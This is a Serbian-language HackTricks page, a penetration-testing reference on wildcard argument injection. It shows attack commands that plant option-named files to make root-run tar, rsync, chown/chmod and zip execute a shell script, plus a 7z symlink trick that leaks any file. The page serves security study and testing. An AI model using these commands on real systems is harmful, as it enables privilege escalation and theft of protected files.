Wildcards Spare tricks

Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

chown, chmod

Možete ukazati koji vlasnik fajla i dozvole želite kopirati za ostale fajlove

touch "--reference=/my/own/path/filename"

Možete iskoristiti ovo koristeći https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (kombinovani napad) Više informacija na https://www.exploit-db.com/papers/33930

Tar

Izvršite proizvoljne komande:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Možete iskoristiti ovo koristeći https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (napad tarom) Više informacija na https://www.exploit-db.com/papers/33930

Rsync

Izvršite proizvoljne komande:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Možete iskoristiti ovo koristeći https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (napad rsyncom) Više informacija na https://www.exploit-db.com/papers/33930

7z

U 7z čak i korišćenjem -- pre * (napomena da -- znači da sledeći unos ne može biti tretiran kao parametar, tako da u ovom slučaju samo putanje do fajlova) možete izazvati proizvoljnu grešku kako biste pročitali fajl, pa ako se izvršava sledeća komanda od strane root korisnika:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

I možete kreirati fajlove u folderu gde se ovo izvršava, možete kreirati fajl @root.txt i fajl root.txt koji je simbolička veza ka fajlu koji želite da pročitate:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Zatim, kada se izvrši 7z, on će tretirati root.txt kao datoteku koja sadrži listu datoteka koje treba komprimirati (to je ono što ukazuje postojanje @root.txt) i kada 7z pročita root.txt, pročitaće /file/you/want/to/read i pošto sadržaj ove datoteke nije lista datoteka, prikazaće grešku prikazujući sadržaj.

Više informacija u Write-up-ovima kutije CTF sa HackTheBox-a.

Zip

Izvršavanje proizvoljnih komandi:

zip name.zip files -T --unzip-command "sh -c whoami"
Naučite hakovanje AWS-a od nule do heroja sa htARTE (HackTricks AWS Red Team Expert)!

Drugi načini podrške HackTricks-u:

Last updated